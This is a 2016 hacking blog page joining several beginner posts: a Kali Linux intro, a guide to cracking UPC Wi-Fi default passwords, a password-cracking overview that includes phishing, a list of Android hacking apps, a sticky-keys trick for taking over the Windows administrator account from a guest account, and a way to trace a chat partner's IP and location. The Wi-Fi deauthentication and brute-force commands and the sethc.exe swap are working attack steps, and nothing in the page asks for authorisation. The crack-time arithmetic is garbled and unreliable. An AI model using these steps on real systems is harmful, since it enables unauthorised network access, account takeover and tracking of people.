Monday 28 November 2016

Hacking With Kali Linux


Why Kali Linux?

With Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now this tutorial will get you started and you'll be hacking with Kali Linux before you know it.







The problem with beginners

Now, I've been dealing with beginners since a long time (and myself was one for a long time too). What they want is magic. A tool which is easy to use, works on Windows, can be download by searching on Google and clicking on the first link we see, and will do all the hacking itself on the push of a button. Sadly, no such tool exists (lets be real, would you use Facebook if a tool existed which you could install on Windows, simply type the person's username/mobile number/email and then just like that get his/her Facebook password?). 

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? If you have installed Kali Linux,  click here to skip past the installation paragraphs and go to hacking section of this post)



Getting Started

Now, I am not boring you with theory (^ As if all this wasn't enough theory). My aim is to get you to the point where you can start hacking with Kali Linux as soon as possible. What I'm gonna do is tell you what to do. The process is rather simple :-




Things get tough now

If you have no previous experience with Linux and virtual machines and all that stuff, getting Kali Linux up and running won't be a piece of cake.You have 2 options 3 options :


1. Read the Kali official documentation

That will give you an idea about what is a virtual machine, how OS can be run from USB, and how to create a partition and run 2 OS simultaneously. This is what I recommend. For that, go to Kali Official Documentation .

2. Read my modified version of Kali documentation

The second option is to look at these posts, which are just sparingly modified (and now outdated) versions of the Kali docs, and offer no advantage other than saving your time as their documentations cover much more than what the ones here do, and you don't really need to know all so much... yet. I'm linking them up here:

3. Utilize the zillions of tutorials on YouTube (New option)

The time this guide was written (for the first time in 2013, then updated in 2014), Kali wasn't so popular. However, now there are plenty of websites dedicated to Kali Linux, and a lot of YouTube videos on how to install Kali. My installation guides are outdated (mine are for Kali 1.0, now even Kali 2.0 is outdated and Kali rolling is what most of you should be using). While you can use an old installation guide and make a few changes and have it work for you, it's better, especially if it's your first time installing an operating system alongside another, that you follow a guide tailored for your situation (eg. if you are installing Kali rolling on Windows 10 on virtualbox, then follow guide for the exact same configuration, and not for Kali 2.0 on Windows 8 on Vmware).
Installing an OS is serious business, don't take it lightly, and don't get discouraged if you fail at first. Also, backup your data if you're going for a dual boot.


Command Line Interface

Some bash commands
Now, if you are really sure about becoming a hacker, you have to get used to linux, and specifically the command line interface. It is often compared to (and rightly so) to command prompt of Windows, but Linux' cli is much efficient and better than command prompt. What you have to do is do all the usual tasks you do in Windows in cli of Linux. Use cd to navigate, poweroff to shutdown, etc.
A pretty awesome site for that is - http://linuxcommand.org/
Going through the complete site is on its own enough exercise to keep you occupied for a month, but you can proceed gradually. The first few tutorials here will keep in mind that you don't have much info about cli, and will be really beginner friendly.


Some Useful Commands:

If you don't plan on learning all of linux cli commands, here are a few that will keep your boat afloat.
  1. The default username and password is 'root' and 'toor'. 
  2. Type 'poweroff' in the terminal to shutdown. 
  3. apt-get command can be used to install tools and updates. 
  4. apt-get update and apt-get upgrade will update all the programs installed on your machine. 
  5. apt-get dist-upgrade will install the latest distribution of Kali(i.e. it upgrades your OS).

PS : Tapping <tab> while typing makes Kali complete the word for you . Double tapping <tab> makes it display all possible words starting with the incomplete word. Ctrl+c stops the functioning of any tool that is running. Pressing the up arrow key shows the command you last typed.


Some Real Hacking With Kali Linux

Assuming you've gone through the above steps and are comfortable with your new hacking environment, its time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe read something on Denial of Service when you have free time. Links here-

Hack wireless networks in Kali Linux using aircrack

Penetration Testing In Kali For Beginners

Denial Of Service Attacks

Share with your friends
Sponsored

ThHow to hack UPC wireless networks and other WLAN pt 1 e Top 10 Wifi Hacking Tools in Kali Linux

v

How to hack UPC wireless networks and other WLAN pt 1

0
In this tutorials we will show you how to hack UPC wireless networks with the default password which is a common thing for many UPC customers. The first step is to create a password list which contains all possible combinations of 8 capital letters. We will be using Maskprocessor in Kali Linux to create the password list. Than we will be capturing a 4 way handshake with Airodump-ng by deauthentication of a connected client with Aireplay-ng. The last step is to brute force the password using Aicrack-ng. In part 2 of this tutorial we will be using oclHashcat with the power of GPU since CPU will take way too much time with this passwords list.

How to hack UPC wireless networks in 3 steps

Step 1: Creating the password list with Maskprocessor
Step 2: Capturing the 4-way handshake with Airodump-ng
Step 3: Brute forcing the password with Aircrack-ng

Creating the password list with Maskprocessor

We will use maskprocessor to generate the password lists piping each letter to a file so we could use multiple computers to speed up brute forcing the password.
maskprocessor A?u?u?u?u?u?u?u -o /usr/A.txt
maskprocessor B?u?u?u?u?u?u?u -o /usr/B.txt
maskprocessor C?u?u?u?u?u?u?u -o /usr/C.txt
etc…. Repeat for every letter in the alphabet.
The filesize for each document will be approximately 60 GB. You can use the following command to see how many different combinations each file will contain:
maskprocessor A?u?u?u?u?u?u?u –combinations
8.031.810.176 combinations…
* 26 letters
208.827.064.576 possible combinations

Step 2: Capturing the handshake with Airodump-ng

The next thing we have to do is capture the handshake with Airodump-ng. We will be using Airodump-ng first to select our target and retrieve it’s BSSID and channel the WiFi access point is broadcasting on. Then we will use Aireplay-ng to de-authenticate a connected client to force a reconnect, which will give us the fourway handshake we need. Now let’s start Airodump-ng to find our target by using the following command:
airodump-ng mon0
Now pick your target’s BSSID and channel and restart Airodump-ng with the following command and look for a connected client:
airodump-ng –bssid [BSSID] -c [channel]-w [filepath to store .cap]wlan0mon
Open a new terminal and issue an deauthentication command for the connected client using Aireplay-ng.
aireplay-ng -0 2 -a [BSSID] -c [Client MAC] mon0
Deauthentication successful and the 4 way handshake is captured!
Aircrack-ng aireplay-ng

Step 3: Brute forcing the password with Aircrack-ng

Let’s do some maths first:
1x AMD hd7970 1000mhz core clock with oclHashcat v1.35 can do 142.000 combinations per second.
26^8 = 208,827,064,576 combinations
26^8 / 142,000 keys per second = 1470613 seconds
2,610,338 / 60 seconds = 24510 minutes
43,505 / 60 minutes = 408,5 hours
725 hours / 24 hours = 17 Days
50% chance of cracking the password in 8.5 days.
It takes 17 days to brute force a standard UPC password and hack UPC wireless networks with a single average videocard using oclHashcat. In this video we will be bruteforcing the file with Aircrack-ng and a processor which takes 100 times longer than bruteforcing the password with a GPU and oclHashcat. Take a look at part 2 of this tutorial on how to use oclHashcat with the power of GPU.
Use the following command to bruteforce the password with Aircrack-ng:
aircrack-ng -a 2 -b [Router BSSID] -w [Filepath to password list] [Filepath to .cap file]
Eventually it will crack the password:
Hack UPC Wireless networks 1

Lesson learned

Nowadays fast GPU’s are available for decent prices and are often the standard in consumer laptops and desktops, especially when they are build for multimedia and gaming. With these powerful CPU’s and GPU’s the average home user has the power to crack passwords which are considered strong and safe by many end users. Even though 17 days is too long for most to crack a Wifi password it is accessible if you really want to. If you add 3 more letters, or even better, numbers or special characters like a ! or a $-sign it will be close to impossible to crack for an average home user.

Saturday 26 November 2016

Password Hacking Tips and Tricks

Password Hacking Tips and Tricks
Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :
1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even ‘well-chosen’ passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
Password hacking tips
Tips for Hack any Mobile Phone
2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user’s personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word “password”, “passcode”, “admin” and their derivatives
* the user’s name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet’s name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on….
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.
Check Your Password Strength
3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications’ (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on “enter” or “login” login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Best Tricks To Increase Your Internet Speed | Speed Up Your Net Speed

Best Tricks To Increase Your Internet Speed | Speed Up Your Net Speed
we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet
much better then it was in the past.
There are Two tricks that will help you to increase your internet speed..
First Method- Speed Up Your Net Speed By 20%
1. First you go to start button
2. Go To Run
3. Type gpedit.msc And Then Hit Enter.

Top 10 Android Apps That Turn Your Phone into a Hacking Device. Hit Like and Share

c
1.SpoofApp
SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009.
2.Andosid
The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.
3.Faceniff
Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks.
4.Nmap
Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses.
5.Anti-Android Network Toolkit
zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.
6.SSHDroid
SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc).
7.WiFi Analyser
Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.
8.Network Discovery
Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security.
9.ConnectBot
ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers.
10.dSploit
Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

How to hack admin account through guest account.

How to hack admin account through
guest account.
1) Go to C:/windows/system32.
2) Copy cmd.exe and paste it on
desktop.
3) Rename cmd.exe to sethc.exe.
4) Copy the new sethc.exe to system
32,when windows asks for overwriting
the file,then click yes.
5) Now Log out from your guest
account and at the user select
window,press shift key 5 times.
6) Instead of Sticky Key confirmation
dialog,command prompt with full
administrator privileges will open.
7) Now type “ NET USER
ADMINISTRATOR “zzz” where “zzz”
can be any password you like and
press enter.
You will see “ The Command
completed successfully” and then exit
the command prompt and login into
administrator with your new password.
Now You have hacked admin through
guest account.

'''''FACEBOOK SHORTCUTS''''''''

''''''''FACEBOOK SHORTCUTS''''''''
For Facebook Help Center - Shift+Alt+0
For Facebook Home Page - Shift+Alt+1
For Your Facebook Profile Page - Shift+Alt+2
For Friend Request - Shift+Alt+3
For Messages - Shift+Alt+4
For Notification - Shift+Alt+5
For Account Settings - Shift+Alt+6
For Privacy Settings - Shift+Alt+7
For Facebook Pages - Shift+Alt+8
For Facebook Terms of Use - Shift+Alt+9
For enable Search - Shift+Alt+?
For Compose a New message - Shift+Alt+m
:::Enjoy:::

How To Trace Location Of Any Person On Facebook!

How To Trace Location Of Any Person On Facebook!
Tracing IP Address Of Person On Facebook Chat Using Command Prompt
Using command prompt you can actually trace out the ip address of a person you chatting on facebook. Just follow the steps below to proceed.
1. First of all start chatting with your friend whose ip address you want to get and make sure that all other apps and background process must be stopped.
2. Now press Win+R of your keyboard,
3. Now type cmd and hit enter.
4. Now in the command prompt that appears type netstat -an and hit enter.
5. Now note down the ip address of person.
6. Now you need to scan that ip address to know the actual location of the person that you can checkout from
http://www.ip-adress.com/ip_tracer

How to Find Out Who’s Stealing and Using Your Wi-Fi Network in PC and Mobile!

How to Find Out Who’s Stealing and Using Your Wi-Fi Network in PC and Mobile!
Who’s On My WiFi Software is free software for windows that comes with lots of features. With this software, you can easily know how many devices currently connected to your wifi network. You can see IP Address, Mac Address and Computer name of connected devices from this software.
Who’s On My Wifi Software: Setup in Windows for Finding Connected WiFi Devices
1. Download Who Is On My WiFi Software for Windows and install in your PC.
2. Make sure you follow all the steps when this software installs on your PC.
3. Click on Scan Now button and you can see all connected devices name including mobile and PC
Who Is On My Wifi Windows is Spyware and Adware Free.
Download Who’s On My Wifi for Windows from: http://whoisonmywifi.com/windows/